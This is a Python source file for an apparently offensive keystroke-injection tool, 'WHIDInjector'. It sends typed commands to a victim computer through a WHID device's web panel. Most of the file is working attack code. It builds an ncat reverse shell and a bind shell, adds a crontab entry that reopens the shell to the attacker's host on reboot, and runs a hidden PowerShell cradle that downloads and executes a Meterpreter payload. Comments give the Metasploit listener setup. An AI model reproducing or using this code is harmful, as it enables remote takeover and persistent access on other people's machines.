#!/usr/bin/python3 # -*- coding: utf-8 -*- # NOTE: python3 WHIDInjector.py -v --host --port 4242 #reverse import requests import argparse import re from WhidInfo import * from WhidEngine import * from pathlib import Path from urllib.parse import urlencode, quote_plus if __name__ == "__main__": # Parsing argument from command line parser = argparse.ArgumentParser() parser.add_argument('-v', action='store_true', dest='verbose',help='Verbosity of the output') parser.add_argument('--force', action='store_true', dest='force', help='Force the output in french') parser.add_argument('--host', nargs='?', default='', help='Host reverse-shell' ) parser.add_argument('--port', nargs='?', default='4242', help='Port reverse-shell' ) parser.add_argument('--user', nargs='?', default='admin', help='Panel username') parser.add_argument('--pass', nargs='?', default='hacktheplanet', help='Panel password') parser.add_argument('--panel', nargs='?', default='', help='Panel url') parser.add_argument('--wifi_ssid', nargs='?', default='Exploit', help='Wifi ssid') parser.add_argument('--wifi_pass', nargs='?', default='DotAgency', help='Wifi password') parser.add_argument('--payload', nargs='?', default='payloads/default.txt', help='Payload template') results = parser.parse_args() # Default payload payload = "" with open(results.payload,'r') as f: payload = f.read() info = WhidInfo() whid = WhidEngine(results.panel) while(True): user_input = input("\033[92m>>> \033[0m") # Handling : SET xxxxxx yyyyyy if user_input.split(" ")[0].upper() == "SET": options = user_input.split(" ") if options[1] == "host": results.host = options[2] elif options[1] == "port": results.port = options[2] elif options[1] == "user": results.user = options[2] elif options[1] == "verbose": results.verbose = options[2].lower() == "true" elif options[1] == "panel": results.panel = options[2] elif options[1] == "wifi_ssid": results.wifi_ssid = options[2] elif options[1] == "wifi_pass": results.wifi_pass = options[2] elif options[1] == "payload": results.payload = options[2] with open(results.payload,'r') as f: payload = f.read() else: print("Unknown option - e.g: SET host") continue else: # Simple user interactions if user_input == "q" or user_input=="exit": exit() elif user_input == "h" or user_input == "help": info.help() info.help_keyboard() info.help_commands() continue # Reverse Shell Linux elif "reverse" == user_input : user_input = "bash -c 'nohup ncat %s %s -e $SHELL &'" % (results.host, results.port) # Crontab Linux elif "crontab" == user_input : user_input = "bash -c '(crontab -l ; echo \"@reboot sleep 200 && ncat %s %s -e /bin/bash\")|crontab 2> /dev/null'" % (results.host, results.port) # Bind Shell Linux elif "bind" == user_input: user_input = "bash -c 'nohup ncat -lvp %s -e $SHELL -k &'" % (results.port) # Meterpreter or anything for Windows elif "meterpreter" in user_input : """ # Use the following to set up the listener use exploit/multi/script/web_delivery set SRVHOST YOUR_SERVER_IP set SRVPORT 4646 set SSL true set target 2 set URIPATH posh-payload set payload windows/meterpreter/reverse_https set ExitOnSession false set LHOST YOUR_SERVER_IP set LPORT 4545 exploit -j -z # E.g: meterpreter https://YOUR_SERVER_IP:4646/posh-payload """ if len(user_input.split(" ")) > 1: msf_host = user_input.split(" ")[1] else: msf_host = "https://%s:%s/posh-payload" % (results.host, results.port) user_input = "powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$i=new-object net.webclient;$i.proxy=[Net.WebRequest]::GetSystemWebProxy();$i.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $i.downloadstring('%s');" % msf_host # Send the payload user_converted = whid.convert_to_keymap(user_input, "CustomDelay:1000\nPrint:%s\nCustomDelay:1000\nPress:176", results.force) whid.send_payload(user_converted, results.panel+"/runlivepayload") continue # Send simple text without using a payload chain elif 'send' == user_input.split(' ')[0]: # Convert the simple text to keymap txt = "".join(user_input.split(' ')[1:]) user_converted = whid.convert_to_keymap(txt, "CustomDelay:1000\nPrint:%s\nCustomDelay:1000\nPress:176", results.force) if results.verbose == True: print('\033[92mText:\033[0m\n%s' % user_converted) # Send the payload whid.send_payload(user_converted, results.panel+"/runlivepayload") continue # Send evil command with default payload if user_input != "": # Convert from AZERTY to QWERTY user_converted = whid.convert_to_keymap(user_input, payload, results.force) if results.verbose == True: print('\033[92mPayload:\033[0m\n%s' % user_converted) # Send the payload whid.send_payload(user_converted, results.panel+"/runlivepayload")